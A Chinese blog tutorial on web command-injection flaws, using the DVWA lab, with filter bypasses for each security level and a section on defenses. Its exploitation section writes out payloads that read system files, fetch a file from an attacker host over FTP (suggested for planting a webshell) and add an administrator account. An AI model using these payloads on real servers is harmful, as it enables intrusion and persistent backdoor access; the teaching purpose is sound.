WEB安全-命令执行漏洞

最新推荐文章于 2024-04-23 21:09:15 发布
最新推荐文章于 2024-04-23 21:09:15 发布
阅读量1.4k 收藏 9
点赞数 4
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32350719/article/details/104616936
版权

一、什么是命令执行漏洞?

1、概述

在Web 程序中,因为业务功能需求要通过Web前端传递参数到后台服务器上执行。

但由于开发人员没有对输入进行严格的过滤,导致攻击者可以构造一些额外的“带有非法目的”命令,去欺骗后台服务器执行这些非法命令。

在存在命令执行漏洞的情况下,如果Web 应用使用的是root权限,则该漏洞可以导致攻击者在服务器上执行任意命令。

以DVWA平台low 安全等级为例,我们来看看这个漏洞的具体成因,漏洞页面如下:
在这里插入图片描述
输入IP地址,点击Submit,就会执行ping命令:
在这里插入图片描述
查看后端代码:
在这里插入图片描述
首先通过php_uname('s')读取操作系统名,与Windows NT对比,判断是不是Windows系统。

如果是windows系统,则通过shell_exec()函数执行ping命令。

如果不是,则判断为Linux系统,执行ping -c 4命令。(因为Linux系统如果不指定发包数,就会一直ping下去)

可以看到,这里并没有对输入的’ip’参数做任何过滤,因此存在命令执行漏洞。

在Windows和Linux中,我们可以使用&来执行多条命令。输入8.8.8.8 & ipconfig ,结果如下:
在这里插入图片描述
ipconfig被一并执行了,并且成功返回结果。

这就是一个简单的命令执行漏洞,如果web应用为root权限,我们还可以执行创建用户等各类操作。

2、常见连接符

除了上面的&符,还有其他连接符,如下。

“|”:前面命令输出结果作为后面命令的输入内容;输入8.8.8.8|whoami :
在这里插入图片描述
“||”:前面命令执行失败的时候才执行后面的命令;输入8.8.8.8||whoami :
在这里插入图片描述
“&”:前面命令执行后接着执行后面的命令;

输入错误地址192.1.1.1&whoami:
在这里插入图片描述
“&&”:前面命令执行成功了才执行后面的命令;

输入错误地址192.1.1.1&&whoami:
在这里插入图片描述
此外,Linux系统还可以使用";"号进行连接。

3、常用命令执行函数

以PHP为例,常用的命令执行函数包括system、exec、shell_exec、passthru。

区别如下:

system:成功执行返回结果的最后一行,否则返回FALSE

exec:成功执行返回结果的最后一行

shell_exec:成功执行返回全部结果,否则返回NULL

passthru :把命令的运行结果原样地直接输出到标准输出设备上

接下来我们来看看DVWA平台,其他安全等级是怎么防护和绕过的。

二、漏洞的分析

1、Medium等级

后端代码:

Medium等级新增str_replace()函数,将输入中的&&和;号替换为空。
在这里插入图片描述
但是我们还有&、|、||等符号可以使用。

输入8.8.8.8&whoami绕过:
在这里插入图片描述
可以看到,这里采用了黑名单过滤的防护方式。

2、High等级

部分后端代码:
在这里插入图片描述
可以看到high等级过滤的更多了,但是还是可以绕过,这里’| '里有个空格。
输入8.8.8.8|whoami,成功执行:
在这里插入图片描述
(强行留后门???)

3、Impossible等级

后端代码如下:
在这里插入图片描述
首先通过stripslashes()函数删除输入中的反斜杠。
然后通过explode()函数,以逗号为分隔符,对输入的内容进行分隔。
最后,使用is_numeric()函数,逐一检查分隔出的每一部分是不是数字。并且使用sizeof()函数判断分隔出来的内容是不是4部分,以此来判断用户输入的是不是IP。
白名单过滤,只有“数字.数字.数字.数字”类型的输入才会被执行,因此不存在命令执行漏洞了。

三、漏洞的利用示例

1、读取指定目录内容

例如读取目录C:\windows\

输入8.8.8.8|dir C:\windows\
在这里插入图片描述
在这里插入图片描述

2、读取指定文件内容

例如C:\windows\win.ini

输入8.8.8.8|type C:\windows\win.ini

查看网页源代码:
在这里插入图片描述

3、文件上传

在攻击者本地写一个php脚本,例如phpinfo.php,开启FTP服务。

输入8.8.8.8|echo open 192.168.211.1 > o&echo get phpinfo.php >> o &echo quit >> o &ftp -A -n -s:o &del /F /Q o

成功下载到服务器,如下:
在这里插入图片描述
尝试访问phpinfo.php,成功:
在这里插入图片描述
同理可上传webshell。

其他还包括创建管理员等操作,这里就不一一演示了:

127.0.0.1 | net user test 123 /add

127.0.0.1 | net localgroup administrators test /add

四、漏洞防御

1、对传入的命令进行严格的过滤

2、在后台对应用的权限进行控制,即使有漏洞,也不能执行高权限命令。

3、使用安全函数对输入转义

EscapeShellCmd()函数
在这里插入图片描述

EscapeShellArg()函数
在这里插入图片描述

RyanWang0000
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB安全-注入漏洞
10-11
WEB安全-注入漏洞,很好的学习PPT SQL注入是一种Web应用代码中的漏洞。 黑客可以构造特殊请求,使Web应用执行带有附加条件的SQL语句 用户请求中带有参数的值,没有进行任何过滤 用户请求中带有参数的值,没有进行...
神秘的IP地址8.8.8.8地址到底是什么?为什么会被用作DNS服务器地址呢?
网络技术联盟站
05-04 9853
首先,我们需要了解一下什么是DNS。DNS是“域名系统”(Domain Name System)的缩写,它是互联网中的一个系统,用于将域名转换为IP地址。因为人们更容易记住域名而不是IP地址,所以DNS系统的作用非常重要。在浏览器中输入一个域名时,浏览器会向DNS服务器发送一个请求,以获取该域名对应的IP地址。DNS服务器会将这个请求转发给其他DNS服务器,直到找到能够提供该域名对应IP地址的DNS服务器。一旦找到了该地址,DNS服务器就会将它返回给浏览器,使得浏览器可以访问该网站。
dns114.114.114..114
weixin_45819980的博客
11-03 1万+
一、两者的联系 114.114.114.114和8.8.8.8,这两个IP地址都属于du公共域名解析服务DNS其中的一部分,zhi而且dao由于不是用于商业用途的,这两个DNS都很纯净,不用担心因ISP运营商导致的DNS劫持等问题,而且都是免费提供给用户使用的。 二、二者的区别 1、114.114.114.114 114.114.114.114是国内移动、电信和联通通用的DNS,手机和电脑端都可以使用,干净无广告,解析成功率相对来说更高,国内用户使用的比较多,而且速度相对快、稳定,是国内用户上网常用的DNS
Web安全——命令执行漏洞(RCE)
最新发布
2402_83242246的博客
04-23 465
命令执行漏洞(Command Execution Vulnerability)是计算机安全领域中的一种漏洞类型,它允许攻击者在目标系统上执行恶意命令或代码。这种漏洞通常是由于应用程序或系统的不安全配置、不充分的输入验证或错误的代码实现造成的。应用有时需要调用一些执行系统命令的函数,当用户能控制这些函数的参数,并且开发人员对这个参数没有严格的过滤时就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞
DNS 查找超时
Jochen的博客
11-17 5142
一、问题:EAI_AGAIN 近日在开发过程中,屡次遇到如下问题: getaddrinfo EAI_AGAIN 查找发现这是一个DNS相关的问题: EAI_AGAIN is a DNS lookup timed out error, means it is a network connectivity error or proxy related error. 即 DNS 查找超时,意味着网络...
将DNS改成8.8.8.8有什么利与弊?
热门推荐
qq_14989227的博客
10-25 16万+
如果DNS服务器设置不当,可能会导致网速慢、弹窗广告、网址打不开、打开不是自己想要的网站、劫持等一系列问题。国内用户“将DNS改成8.8.8.8”只会造成有弊无利的结果,原因就在于这个DNS服务器是企业提供的公用DNS服务器,它由谷歌公司于2009年发布,主要为了替代ISPs或其他公司提供的DNS服务。但其机房在国外,国内无节点!只适合国外用户使用! 解决办法: 1、建议使用ISP默认
校园网进不去B站/CSDN怎么办?一招搞定
流楚丶格念的博客
09-13 1万+
打开控制面板→查看网络状态和任务→更改适配器设置→双击网络Internet协议版本→属性→使用下面的DNS服务地址:首选DNS写校园网所需DNS,备用DNS改为114.114.114.114 ,备用:114.114.115.115 或者 8.8.8.8114.114.114.114和8.8.8.8是常见的DNS地址,8.8.8.8为GOOGLE公司DNS地址是全球通用的,而114.114.114.114是全国通用DNS地址,国内用户使用较多,而且速度比较快也很稳定。
web安全-dvwa实战手
07-05
本文档旨在提供DVWA靶场的攻略和实践技巧,帮助用户更好地理解和应对Web应用...7.命令注入:描述通过用户输入的方式将恶意命令传递给应用程序并执行漏洞。提供如何利用该漏洞执行系统命令,并介绍相应的防御措施。
第五第六式web安全之xss漏洞命令执行漏洞专题.pdf
06-22
tsrc线上培训 第五第六式web安全之xss漏洞命令执行漏洞专题
网络安全原理与应用:windows命令执行漏洞演示.pptx
05-16
windows命令执行漏洞演示;;Windows命令执行漏洞演示;Windows命令执行漏洞演示;Windows命令执行漏洞演示;Windows命令执行漏洞演示;Windows命令执行漏洞演示;Windows命令执行漏洞演示;Windows命令执行漏洞演示;Windows...
102-web漏洞挖掘之任意命令执行漏洞.pdf
03-15
102-web漏洞挖掘之任意命令执行漏洞
最快的公共dns服务器_如何使用Google公共DNS服务器
cunjiu9486的博客
10-06 1万+
最快的公共dns服务器Google is a huge company that provides paid and free services. It mainly operates in the IT and internet area. The Internet uses DNS in order to solve domain names into IP addresses. Becaus...
如何解决Mac上网速度很慢的问题(多种可能分析)
探究苹果技术原理和学习新技术(锲而舍之,朽木不折;锲而不舍,金石可镂。)
05-08 10万+
问题:我发现在我的Mac上上网的速度很慢。 第一种分析: 问题分析:虽然Mac上的运行速度很慢,但同时在我的两台手机上面的运行速度都比较快。我刚开始怀疑是路由器的问题,如果是路由器的问题,那么手机肯定不会很块,手机也会很慢,可以断定肯定是我的mac设置出了问题,我按个这个步骤寻找,去掉8.8.8.8,问题解决了。 将上面的DNS地址8.8.8.8去掉就好了 分析8.8.8......
了解Linux网络设置
ZFX20001123的博客
01-06 1023
一、查看网络设置 1.1.查看所有活动的网络接口信息 1.1.1.查看所有网络接口信息 ifconfig 1.1.2.查看指定网络接口信息 ifconfig 指定网卡 (1)mtu:代表最大传输单元,它的单位是字节。在我们常用的以太网中,MTU一般是1500,而无线路由器默认一般是 1492。 本地MTU值 > 网络MTU值 → 拆包,效率下降 本地MTU值 < 网络MTU值 → 未发挥最大传输能力 本地MTU值 < 网络MTU值 → 理想的本地.
计算机网络相关
wondering_cat的博客
09-27 1258
1.DNS域名解析过程 当一个用户在地址栏输入www.taobao.com时,DNS解析过程如下: 1. 浏览器先检查自身缓存中有没有被解析过的这个域名对应的ip地址,如果有,解析结束。同时域名被缓存的时间也可通过TTL属性来设置。 2. 如果浏览器缓存中没有命中,浏览器会检查操作系统缓存中有没有对应的已解析过的结果。而操作系统也有一个域名解析的过程。在windows中可通过c盘里一个叫hosts的文件来设置,如果你在这里指定了一个域名对应的ip地址,那浏览器会首先使用这个ip地址。 ...
DNS对网络连通性的影响
A soul tortured by desire
07-20 3949
DNS提供域名解析,但是不正确的DNS对网络连通性有很大的影响。 今天在国外网站上下载文件时把电脑的本地DNS修改为了8.8.8.8 然后打开百度就特别卡 ping www.baidu.com 有特别严重的丢包 最初以为是本地哪台PC网卡中病毒了,一直在局域网发arp广播包,导致的广播风暴造成的丢包,最后才想到DNS。 将DNS修改后,DNS服务器对www.baidu.com的域名进行了更优的路径切换,实现了正常的访问百度 知其然,更要知其所以然 8.8.8.8是谷歌提供的免费域名解
Web安全命令执行漏洞
qq_42751192的博客
08-12 1214
Web 应用需要调用一些执行系统命令的函数时,并且用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞
web安全】——命令执行漏洞(RCE)详解
Demo不是emo的博客
09-20 1万+
这个阶段需要沉定来积累经验,靶场,漏洞复现和总结经验才是当前的中心任务,所以我也想好好捋一下其他类型的漏洞,同时也分享出来,今天的内容是命令执行漏洞
WEB 安全—深入学习命令执行漏洞
Beret-81的博客
06-17 1224
命令执行上下文中,|、||、& 和 && 是用于控制命令执行的操作符。它们在使用和行为上有所不同:管道操作符 |:作用:将前一个命令的输出作为后一个命令的输入,用于连接多个命令执行结果。示例:command1 | command2,将 command1 的输出作为 command2 的输入。逻辑或操作符 ||:作用:用于在命令执行时,只有前一个命令执行失败(返回非零退出状态码)时才执行后续的命令
web安全命令执行漏洞
05-26
Web安全命令执行漏洞是指攻击者能够通过输入恶意代码或字符串,将其注入到Web应用程序的输入参数中,从而使得攻击者能够远程执行系统命令或者在服务器执行任意代码。这种漏洞往往存在于用户输入的表单、Cookies、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值